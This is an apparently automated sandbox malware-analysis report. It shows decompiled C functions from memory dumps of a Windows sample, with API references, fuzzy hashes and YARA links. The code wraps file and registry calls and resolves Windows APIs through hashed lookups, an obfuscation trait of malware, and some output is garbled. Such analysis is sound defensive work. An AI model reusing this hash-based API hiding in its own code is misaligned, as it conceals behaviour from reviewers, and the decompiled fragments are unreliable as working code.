Instruction Fuzzy Hash: FA41F5B0244282EFF755D6ED9C60BAF76DD9B92384F108C29A560DA1D6DB30CC4BC762

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E8F57B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E8F3064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E8EF828(_a8, _t15);
							if(E6E8F3064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E8EF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e8f57b8
0x6e8f57b9
0x6e8f57bb
0x6e8f57c0
0x6e8f57c7
0x6e8f57cb
0x6e8f57cb
0x6e8f57cb
0x6e8f57cf
0x6e8f5815
0x6e8f5815
0x6e8f57d1
0x6e8f57d1
0x6e8f57d7
0x6e8f57e0
0x6e8f57e3
0x6e8f57fa
0x6e8f580b
0x6e8f580b
0x6e8f580d
0x6e8f5813
0x6e8f581e
0x6e8f5836
0x6e8f5856
0x6e8f5856
0x6e8f5858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8f57d7
0x6e8f5860

APIs

RegQueryValueExA.KERNELBASE(?,6E8FD1F8,00000000,?,00000000,00000000,?,?,?,6E8FD1F8,?,6E8F5887,?,00000000,00000000), ref: 6E8F580B
RegQueryValueExA.KERNELBASE(?,6E8FD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E8FD1F8,?,6E8F5887,?,00000000), ref: 6E8F5856

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 55a35b86e03548f8184c3ba6fbf174d4b090b63bbd4d16e3f26b68b220204c77
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: 2B11723121D305EBD650DBA9AC90EABBBDCEF46794F10CD1DB49497181EB21EC02CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E8F5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E8ED1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E8ED6D0(__ecx, _t60);
					E6E8ECFF8(_t56,  *_t60);
					E6E8ECFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E8F62B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E8EC26C(_t40);
					if(E6E8EC280(_t40) != 0) {
						_t56[2] = E6E8F35F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E8F3064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E8F3698(_t59, 0xff, 8);
						if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e8f5b43
0x6e8f5b45
0x6e8f5b52
0x6e8f5b56
0x6e8f5b5a
0x6e8f5b64
0x6e8f5b6b
0x6e8f5b6b
0x6e8f5b72
0x6e8f5b74
0x6e8f5b79
0x6e8f5b82
0x6e8f5b8a
0x6e8f5b8a
0x6e8f5b7b
0x6e8f5b7d
0x6e8f5b7d
0x6e8f5b79
0x6e8f5b8f
0x6e8f5b9b
0x6e8f5ccc
0x6e8f5c09
0x6e8f5c12
0x6e8f5c13
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x00000000
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cae
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x00000000
0x6e8f5c92
0x6e8f5ba1
0x6e8f5bb1
0x6e8f5bb1

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3072628fb735c9264d1673d90769c5302cd58ce8ee77f8a6596f294543c6a829
Instruction ID: 3d2ddbbc0626aeae69ef183836078340e2f098f20c97dceb649f3d24d4a9cc99
Opcode Fuzzy Hash: 3072628fb735c9264d1673d90769c5302cd58ce8ee77f8a6596f294543c6a829
Instruction Fuzzy Hash: EE31F430244309FFEA506BF94D94F6B7A9DDB816C8F108C39F9429A1C5EB219D1AC261

Uniqueness

Uniqueness Score: -1.00%

Function 009E26AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E009E1ED2(__eflags);
				_t29 = E009E180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E009E200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E009E1000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E009E16D7();
				 *_t56 = _v20; // executed
				E009E2092(_t47, _t54, _t55); // executed
				return 0;
			}

0x009e26aa
0x009e26b3
0x009e26b6
0x009e26b9
0x009e26c1
0x009e26c4
0x009e26cc
0x009e26cf
0x009e26d4
0x009e26da
0x009e26dd
0x009e26e0
0x009e26e0
0x009e270e
0x009e2711
0x009e2719
0x009e271c
0x009e271f
0x009e2727
0x009e272a
0x009e272d
0x009e2734
0x009e2736
0x009e2739
0x009e273c
0x009e273f
0x009e2742
0x009e2706
0x009e2706
0x009e276e
0x009e26ea
0x009e26ec
0x009e26ec
0x009e2749
0x009e274c
0x009e2754
0x009e2757
0x009e2765

APIs

FreeConsole.KERNELBASE ref: 009E26EA

Memory Dump Source

Source File: 00000000.00000002.648952554.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: e01a2c7d3ca09d46e6d857cf59e4e20d39824949680159502874749310686aee
Instruction ID: 4b346f030a0fd15ed0ef370777d1181752845f2d14cccf621f55b49b508442a2
Opcode Fuzzy Hash: e01a2c7d3ca09d46e6d857cf59e4e20d39824949680159502874749310686aee
Instruction Fuzzy Hash: AC21D6B5D042598FCB01EFAAC8959AEBBF4FF48310F144929E445AB341E639AD80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8F1166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e8f1168
0x6e8f116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E8F117B

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: cf22dcc924674104c6bc96d6aefa18d492a27b6f00e9422ba864521a545d76d6
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: 2311A7B0504283DFFB56C5E998B0BAE76589F827C0F104C65E870DA0E7DA35C89BC662

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E8F5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E8EC26C(_t24);
				if(E6E8EC280(_t24) != 0) {
					_t34[2] = E6E8F35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E8F3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E8F3698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e8f5bbd
0x6e8f5bc1
0x6e8f5bc4
0x6e8f5bc7
0x6e8f5c09
0x6e8f5c12
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x6e8f5cc6
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c72
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x6e8f5c92
0x6e8f5c92
0x6e8f5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E8F5C3E

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: 705309c4d526a8056d29fcda634602765b30a2e932cf10807dd7f269f9fa861f
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: A401C03128430AFBFA5067E94D45F7A7A8CDBC26D8F018C36BA02951C5EA12AD568121

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E8F5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E8EC26C(_t24);
					if(E6E8EC280(_t24) != 0) {
						_t33[2] = E6E8F35F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E8F3064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E8F3698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e8f5be5
0x6e8f5be7
0x6e8f5bfe
0x6e8f5c09
0x6e8f5c12
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x6e8f5cc6
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c72
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x6e8f5c92
0x6e8f5c92
0x6e8f5be9
0x6e8f5be9
0x6e8f5bf0
0x6e8f5bf0
0x6e8f5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E8F5C3E

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 5ed01df1f7044221f12100109f5f5992c3d27de9f552cb7aade4336aa870cc8f
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 6E01043528430AFEE69057E98C44F6B7A4CDB822C8F10CC35BA02555C5DB22AD5AC121

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E8F5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E8EC26C(_t24);
				if(E6E8EC280(_t24) != 0) {
					_t34[2] = E6E8F35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E8F3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E8F3698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e8f5bd1
0x6e8f5bd8
0x6e8f5bdb
0x6e8f5c09
0x6e8f5c12
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x6e8f5cc6
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c72
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x6e8f5c92
0x6e8f5c92
0x6e8f5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E8F5C3E

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 29ce50104e7198976e1c5735f0539f6fbb29f08bbfa3bc4d0daaf4b5d09b201a
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 0D01D23568030AFAF75067E94D44F7B7A4DDB82298F008C36BA02951C5EE26AD5AC121

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E8F5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E8EC26C(_t23);
				if(E6E8EC280(_t23) != 0) {
					_t31[2] = E6E8F35F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E8F3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8F3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e8f5bb3
0x6e8f5bba
0x6e8f5c09
0x6e8f5c12
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x6e8f5cc6
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c72
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x6e8f5c92
0x6e8f5c92
0x6e8f5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E8F5C3E

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 4f5733b536e1dcb4d31f643edcfabba44f78126e3dd34d05023f939e426d5b3e
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 2701243168030AFBFA9067E98C44F7B7A4CCB823D8F008C35BA02651C5EE12AD66C121

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E8F5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E8F3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E8EC26C(_t23);
				if(E6E8EC280(_t23) != 0) {
					_t31[2] = E6E8F35F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E8F3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8F3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E8F3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e8f5c01
0x6e8f5c05
0x6e8f5c09
0x6e8f5c12
0x6e8f5c18
0x6e8f5c19
0x6e8f5c0b
0x6e8f5c0d
0x6e8f5c0d
0x6e8f5c2f
0x6e8f5c43
0x6e8f5c31
0x6e8f5c3e
0x6e8f5c40
0x6e8f5c40
0x6e8f5c45
0x6e8f5c4a
0x6e8f5c58
0x6e8f5cc3
0x6e8f5cc6
0x6e8f5c5a
0x6e8f5c5f
0x6e8f5cac
0x6e8f5cb0
0x6e8f5cba
0x6e8f5cba
0x6e8f5cb0
0x6e8f5c61
0x6e8f5c6d
0x6e8f5c72
0x6e8f5c86
0x6e8f5c88
0x6e8f5c89
0x6e8f5c8a
0x6e8f5c8c
0x6e8f5c8e
0x6e8f5c8f
0x6e8f5c8f
0x6e8f5c92
0x6e8f5c92
0x6e8f5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E8F5C3E

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

